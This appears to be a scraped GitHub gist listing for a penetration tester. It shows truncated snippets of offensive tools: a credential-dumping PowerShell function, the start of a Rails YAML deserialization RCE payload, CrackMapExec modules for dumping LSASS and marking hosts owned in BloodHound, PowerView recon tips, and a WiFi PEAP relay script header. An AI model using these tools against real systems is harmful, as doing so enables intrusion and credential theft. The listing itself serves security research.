mpgn

Force your luck, hold on to your happiness, and go toward your risk.
@mpgn
mpgn / node.json
Last active December 23, 2018 20:13
{
"nodes": [
{
"id": "Alice"
},
{
"id": "Bob"
},
{
"id": "Carol"
function Invoke-Mi
<#
#>
[CmdletBinding(DefaultParameterSetName="DumpCreds")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
@mpgn
mpgn / SubtleCrypto.js
Last active May 6, 2024 03:25
SubtleCrypto javascript example
// example based on https://github.com/diafygi/webcrypto-examples#rsa-oaep
function importKey() {
return window.crypto.subtle.importKey(
"jwk", //can be "jwk" or "raw"
{ //this is an example jwk key, "raw" would be an ArrayBuffer
kty: "oct",
k: "Y0zt37HgOx-BY7SQjYVmrqhPkO44Ii2Jcb9yydUDPfE",
alg: "A256GCM",
ext: true,
@mpgn
mpgn / railspwn.rb
Created March 18, 2019 21:21 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
@mpgn
mpgn / areadme.md
Last active December 6, 2019 17:50
Procdump CME module that dumps the LSASS process and extracts the result with pypykatz
  1. install pypykatz with pip install pypykatz outside your pipenv
  2. add this file to cme/module/procdump.py
  3. compile with python setup.py install
  4. run cme smb 172.16.60.152 -u Administrator -p P@ssword -M procdump


@mpgn
mpgn / README.md
Created November 26, 2019 15:12
CrackMapExec module that marks every target owned by the attacker as "owned" in BloodHound

Installation

  • Copy bloodhound_owned.py into cme/modules and reinstall CrackMapExec with python setup.py install
  • pip install neo4j

Usage

cme smb 10.10.0.0/24 -d adsec.local -u jsnow -p Winter_is_coming_\! -M bloodhound_owned
@mpgn
mpgn / PowerView-3.0-tricks.ps1
Created March 29, 2020 16:35 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@mpgn
mpgn / Blackfield vs NetExec .md
Last active April 17, 2024 15:02
Blackfield vs NetExec for fun and profit @mpgn_x64
@mpgn
mpgn / wifi-relay.sh
Created November 2, 2020 11:01 — forked from 1mm0rt41PC/wifi-relay.sh
Wifi easy PEAP relay
#!/bin/bash
# Wifi easy PEAP relay
#
# Author: 1mm0rt41PC - immortal-pc.info - https://github.com/1mm0rt41PC
#
# Ref:
# - https://github.com/sensepost/hostapd-mana
# - https://github.com/sensepost/wpa_sycophant
# - https://sensepost.com/blog/2019/peap-relay-attacks-with-wpa_sycophant/
# - https://www.youtube.com/watch?v=eYsGyvGxlpI&feature=youtu.be&t=1052